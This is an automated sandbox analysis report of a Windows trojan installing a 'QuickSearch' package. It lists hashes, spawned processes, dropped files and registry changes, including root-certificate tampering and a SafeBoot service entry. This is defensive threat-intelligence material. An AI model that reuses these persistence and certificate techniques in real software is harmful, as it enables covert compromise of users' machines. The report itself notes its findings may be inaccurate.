Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 2b140f9d8cd365bf8522a5118d0b06ef
SHA1: 500604921e29e49301d1971a684e38791997b52f
SHA256: dd09ed45b658c0e639bb45198d9e9793797ac90a0203b35c323490ee476879c7
SSDeep: 1536:6pgpHzb9dZVX9fHMvG0D3XJcMsA84TbE/ rN5hsak32SDO:4gXdZt9P6D3XJcMle r9/SDO
Size: 57392 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
zcengine.exe:1284
zcengine.exe:1208
zcengine.exe:684
sc.exe:536
sc.exe:1632
poz.exe:2584
SchTasks.exe:2660
%original file name%.exe:944
setupfs_1123.exe:1940
zengine.exe:2036
zengine.exe:1968
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process zcengine.exe:1284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\zcengine.log (434 bytes)
The process zcengine.exe:1208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\zcengine.log (83902 bytes)
%WinDir%\Temp\CertsIE.dat (12284 bytes)
%System%\zcengineOff.ini (784 bytes)
%System%\zcengine.ini (872 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\CertsIE.dat (0 bytes)
The process zcengine.exe:684 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\zcengine.log (759 bytes)
The process %original file name%.exe:944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\I9SFMNGD\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\setupfs_1123.exe (332214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01M9AVQ1\setupfs_4435[1].exe (332214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JMRO554\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\UAC.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01M9AVQ1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SVMBSZ6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\ns3.tmp (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1.tmp (0 bytes)
C:\setupfs_1123.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\ns3.tmp (0 bytes)
The process setupfs_1123.exe:1940 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\QuickSearch\zcinstaller.exe (5896 bytes)
%Program Files%\QuickSearch\uninstall.exe (1793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsE.tmp (6 bytes)
%Program Files%\QuickSearch\AZDLL64.exe (3704 bytes)
%Program Files%\QuickSearch\zcengine.dll (9984 bytes)
%Program Files%\QuickSearch\zcwfp64.sys (1552 bytes)
%Program Files%\QuickSearch\spw3016.exe (1856 bytes)
%Program Files%\QuickSearch\slite.exe (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\GetVersion.dll (6 bytes)
%Program Files%\QuickSearch\nssutil3.dll (5064 bytes)
%Program Files%\QuickSearch\ssl3.dll (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns8.tmp (6 bytes)
%Program Files%\QuickSearch\out.txt (52 bytes)
%Program Files%\QuickSearch\libnspr4.dll (11048 bytes)
C:\END (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsC.tmp (6 bytes)
%Program Files%\QuickSearch\libplds4.dll (1552 bytes)
%Program Files%\QuickSearch\softokn3.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (784 bytes)
%Program Files%\QuickSearch\poz.exe (4080 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\pwgen.dll (784 bytes)
%Program Files%\QuickSearch\zcengine64.dll (11728 bytes)
%Program Files%\QuickSearch\zengine64.exe (9664 bytes)
%Program Files%\QuickSearch\zcwfp.sys (1552 bytes)
%Program Files%\QuickSearch\zengine.ini (116 bytes)
%Program Files%\QuickSearch\nssckbi.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsD.tmp (6 bytes)
%Program Files%\QuickSearch\zcengine.tlb (1856 bytes)
%Program Files%\QuickSearch\zengine.exe (17395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsExec.dll (6 bytes)
%Program Files%\QuickSearch\freebl3.dll (11152 bytes)
%Program Files%\QuickSearch\smime3.dll (5064 bytes)
%Program Files%\QuickSearch\AZDLL64.dll (5184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (235157 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsA.tmp (6 bytes)
%Program Files%\QuickSearch\libplc4.dll (1552 bytes)
%Program Files%\QuickSearch\zcenginecert.dll (6056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\I9SFMNGD\ext[1].htm (2 bytes)
%Program Files%\QuickSearch\sqlite3.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns9.tmp (6 bytes)
%Program Files%\QuickSearch\nss3.dll (29256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsB.tmp (6 bytes)
%Program Files%\QuickSearch\zcengine.exe (72529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
%Program Files%\QuickSearch\nssdbm3.dll (6360 bytes)
%Program Files%\QuickSearch\AZDLL.dll (3744 bytes)
The Trojan deletes the following file(s):
%Program Files%\QuickSearch\0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns8.tmp (0 bytes)
%Program Files%\QuickSearch\poz.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\pwgen.dll (0 bytes)
%Program Files%\QuickSearch\out.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\GetVersion.dll (0 bytes)
The process zengine.exe:2036 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\lengine.ini.log (895 bytes)
The process zengine.exe:1968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\zcengine.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lengine.ini.log (11803 bytes)
Registry activity
The process zcengine.exe:1284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 AE F5 45 0D A5 CB 8C 66 38 B8 4E FA CA 4C 21"
The process zcengine.exe:1208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 90 B3 E6 8E 9A 26 02 B4 D6 06 4B 42 4F A5 6F"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6A6D0BE08DB130A0C56954B3C6E49ABC012AD569]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 6A 6D 0B E0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"6A6D0BE08DB130A0C56954B3C6E49ABC012AD569"
The process zcengine.exe:684 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\zcengineLib.DataTable.1\CLSID]
"(Default)" = "{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}"
[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\zcengineLib.DataTableFields.1]
"(Default)" = "DataTableFields Class"
[HKCR\Interface\{83E07061-02D1-41EC-8751-BB176B823C38}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{3F8D3B31-AEB8-4ED7-8B05-5556068D6B54}]
"(Default)" = "IReadOnlyManager"
[HKCR\Interface\{3F8D3B31-AEB8-4ED7-8B05-5556068D6B54}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.ReadOnlyManager\CurVer]
"(Default)" = "zcengineLib.ReadOnlyManager.1"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}]
"(Default)" = "DataTable Class"
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\zcengine]
"(Default)" = "service"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"LocalService" = "zcengine"
[HKCR\Interface\{F7971E81-FC71-4659-8CCE-C903576E0924}]
"(Default)" = "IDataTable"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"kp1" = "0"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}]
"(Default)" = "DataTableFields Class"
[HKCR\zcengineLib.ReadOnlyManager.1]
"(Default)" = "ReadOnlyManager Class"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{A471A4AA-5C18-429F-81BF-6C760941DB74}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{F2FB003D-07C7-4E4D-80E3-00B49468A6F4}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.LSPLogic\CLSID]
"(Default)" = "{4D4D0357-0376-4656-A040-65AC089E84A2}"
[HKCR\Interface\{6ED1EF08-DFF4-4252-8986-691D06C54131}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.LSPLogic\CurVer]
"(Default)" = "zcengineLib.LSPLogic.1"
[HKCR\Interface\{F7971E81-FC71-4659-8CCE-C903576E0924}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{029AF757-A988-4BDD-A744-A4C7BCEBB011}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}]
"(Default)" = "DataContainer Class"
[HKCR\Interface\{074DCA49-F6A1-417F-B79E-D5E3ADC30330}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{F2FB003D-07C7-4E4D-80E3-00B49468A6F4}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{024BF4C8-B53D-45B9-957F-D3BA9655FF39}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{9F0948E7-227A-4F1B-9849-2D8912F185A7}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.LSPLogic]
"(Default)" = "LSPLogic Class"
[HKCR\Interface\{389562C4-59D9-40C4-966E-28DA91725FFE}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}\ProgID]
"(Default)" = "zcengineLib.DataTableFields.1"
[HKCR\Interface\{389562C4-59D9-40C4-966E-28DA91725FFE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{074DCA49-F6A1-417F-B79E-D5E3ADC30330}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{C0A7C2B3-86D6-42AF-8221-79C9E4AD50BA}\TypeLib]
"Version" = "1.0"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"ServiceParameters" = "-Service"
[HKCR\Interface\{F2FB003D-07C7-4E4D-80E3-00B49468A6F4}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{074DCA49-F6A1-417F-B79E-D5E3ADC30330}\TypeLib]
"Version" = "1.0"
[HKCR\zcengineLib.WFPController.1\CLSID]
"(Default)" = "{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}"
[HKCR\zcengineLib.WFPController]
"(Default)" = "WFPController Class"
[HKCR\zcengineLib.WFPController.1]
"(Default)" = "WFPController Class"
[HKCR\CLSID\{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
"(Default)" = "DataTableHolder Class"
[HKCR\Interface\{6ED1EF08-DFF4-4252-8986-691D06C54131}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}\ProgID]
"(Default)" = "zcengineLib.DataContainer.1"
[HKCR\Interface\{00E3D575-A24C-4BBC-A708-BCDB8BBCA6C7}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\TypeLib\{029AF757-A988-4BDD-A744-A4C7BCEBB011}\1.0\HELPDIR]
"(Default)" = "%Program Files%\QuickSearch"
[HKCR\zcengineLib.DataContainer.1\CLSID]
"(Default)" = "{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}"
[HKCR\zcengineLib.DataController\CurVer]
"(Default)" = "zcengineLib.DataController.1"
[HKCR\zcengineLib.DataContainer]
"(Default)" = "DataContainer Class"
[HKCR\Interface\{83E07061-02D1-41EC-8751-BB176B823C38}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}\VersionIndependentProgID]
"(Default)" = "zcengineLib.DataController"
[HKCR\Interface\{3323765B-5B83-4406-841E-473DBA4B8F29}]
"(Default)" = "IParentalControl"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\Interface\{9F0948E7-227A-4F1B-9849-2D8912F185A7}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\zcengineLib.ReadOnlyManager]
"(Default)" = "ReadOnlyManager Class"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}\VersionIndependentProgID]
"(Default)" = "zcengineLib.DataContainer"
[HKCR\CLSID\{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataTableHolder\CurVer]
"(Default)" = "zcengineLib.DataTableHolder.1"
[HKCR\zcengineLib.LSPLogic.1\CLSID]
"(Default)" = "{4D4D0357-0376-4656-A040-65AC089E84A2}"
[HKCR\Interface\{389562C4-59D9-40C4-966E-28DA91725FFE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{9F0948E7-227A-4F1B-9849-2D8912F185A7}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{6ED1EF08-DFF4-4252-8986-691D06C54131}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{074DCA49-F6A1-417F-B79E-D5E3ADC30330}]
"(Default)" = "IParentalControlController"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\Interface\{024BF4C8-B53D-45B9-957F-D3BA9655FF39}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{A471A4AA-5C18-429F-81BF-6C760941DB74}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}\ProgID]
"(Default)" = "zcengineLib.DataTableHolder.1"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\Interface\{00E3D575-A24C-4BBC-A708-BCDB8BBCA6C7}]
"(Default)" = "IDataStatistics"
[HKCR\Interface\{F7971E81-FC71-4659-8CCE-C903576E0924}\TypeLib]
"Version" = "1.0"
[HKCR\zcengineLib.ReadOnlyManager\CLSID]
"(Default)" = "{F1BC674D-15D8-46C5-AC51-12AB16D67616}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 72 5F 2A 23 46 C2 F6 E8 A6 41 79 16 3D 5A DF"
[HKCR\Interface\{C0A7C2B3-86D6-42AF-8221-79C9E4AD50BA}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{F7971E81-FC71-4659-8CCE-C903576E0924}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}]
"(Default)" = "LSPLogic Class"
[HKCR\AppID\zcengine.EXE]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\zcengineLib.DataTable.1]
"(Default)" = "DataTable Class"
[HKCR\zcengineLib.DataContainer\CLSID]
"(Default)" = "{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}\ProgID]
"(Default)" = "zcengineLib.LSPLogic.1"
[HKCR\Interface\{C0A7C2B3-86D6-42AF-8221-79C9E4AD50BA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{00E3D575-A24C-4BBC-A708-BCDB8BBCA6C7}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3F8D3B31-AEB8-4ED7-8B05-5556068D6B54}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{C0A7C2B3-86D6-42AF-8221-79C9E4AD50BA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.DataTableFields]
"(Default)" = "DataTableFields Class"
[HKCR\zcengineLib.DataController]
"(Default)" = "DataController Class"
[HKCR\Interface\{389562C4-59D9-40C4-966E-28DA91725FFE}]
"(Default)" = "IDataTableFields"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\Interface\{00E3D575-A24C-4BBC-A708-BCDB8BBCA6C7}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.DataTableHolder\CLSID]
"(Default)" = "{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}"
[HKCR\Interface\{3323765B-5B83-4406-841E-473DBA4B8F29}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{3323765B-5B83-4406-841E-473DBA4B8F29}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\zcengineLib.ReadOnlyManager.1\CLSID]
"(Default)" = "{F1BC674D-15D8-46C5-AC51-12AB16D67616}"
[HKCR\Interface\{3323765B-5B83-4406-841E-473DBA4B8F29}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}\ProgID]
"(Default)" = "zcengineLib.ReadOnlyManager.1"
[HKCR\Interface\{6ED1EF08-DFF4-4252-8986-691D06C54131}]
"(Default)" = "IWatchDog"
[HKCR\zcengineLib.WFPController\CLSID]
"(Default)" = "{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataController.1\CLSID]
"(Default)" = "{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}"
[HKCR\Interface\{F7971E81-FC71-4659-8CCE-C903576E0924}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataContainer.1]
"(Default)" = "DataContainer Class"
[HKCR\Interface\{C0A7C2B3-86D6-42AF-8221-79C9E4AD50BA}]
"(Default)" = "IDataContainer"
[HKCR\Interface\{3F8D3B31-AEB8-4ED7-8B05-5556068D6B54}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"InstallingUser" = "eABwADkAXABhAGQAbQAAAA=="
[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\Interface\{024BF4C8-B53D-45B9-957F-D3BA9655FF39}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}]
"(Default)" = "WFPController Class"
[HKCR\Interface\{00E3D575-A24C-4BBC-A708-BCDB8BBCA6C7}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{83E07061-02D1-41EC-8751-BB176B823C38}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.DataTableHolder.1\CLSID]
"(Default)" = "{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}"
[HKCR\zcengineLib.DataTableFields.1\CLSID]
"(Default)" = "{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}"
[HKCR\CLSID\{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}\VersionIndependentProgID]
"(Default)" = "zcengineLib.DataTableHolder"
[HKCR\TypeLib\{029AF757-A988-4BDD-A744-A4C7BCEBB011}\1.0]
"(Default)" = "acengine 1.0 Type Library"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\zcengineLib.DataTableFields\CurVer]
"(Default)" = "zcengineLib.DataTableFields.1"
[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}\ProgID]
"(Default)" = "zcengineLib.DataController.1"
[HKCR\Interface\{074DCA49-F6A1-417F-B79E-D5E3ADC30330}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\Interface\{A471A4AA-5C18-429F-81BF-6C760941DB74}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataTable\CurVer]
"(Default)" = "zcengineLib.DataTable.1"
[HKCR\zcengineLib.LSPLogic.1]
"(Default)" = "LSPLogic Class"
[HKCR\zcengineLib.DataTable\CLSID]
"(Default)" = "{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}"
[HKCR\zcengineLib.DataTableFields\CLSID]
"(Default)" = "{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}"
[HKCR\Interface\{024BF4C8-B53D-45B9-957F-D3BA9655FF39}]
"(Default)" = "ISSHController"
[HKCR\Interface\{6ED1EF08-DFF4-4252-8986-691D06C54131}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{024BF4C8-B53D-45B9-957F-D3BA9655FF39}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}\ProgID]
"(Default)" = "zcengineLib.WFPController.1"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}\VersionIndependentProgID]
"(Default)" = "zcengineLib.WFPController"
[HKCR\Interface\{A471A4AA-5C18-429F-81BF-6C760941DB74}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}\VersionIndependentProgID]
"(Default)" = "zcengineLib.LSPLogic"
[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}]
"(Default)" = "DataController Class"
[HKCR\Interface\{F2FB003D-07C7-4E4D-80E3-00B49468A6F4}]
"(Default)" = "IWFPController"
[HKCR\Interface\{9F0948E7-227A-4F1B-9849-2D8912F185A7}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}\ProgID]
"(Default)" = "zcengineLib.DataTable.1"
[HKCR\Interface\{3323765B-5B83-4406-841E-473DBA4B8F29}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"(Default)" = "zcengine"
[HKCR\zcengineLib.DataContainer\CurVer]
"(Default)" = "zcengineLib.DataContainer.1"
[HKCR\zcengineLib.DataTableHolder]
"(Default)" = "DataTableHolder Class"
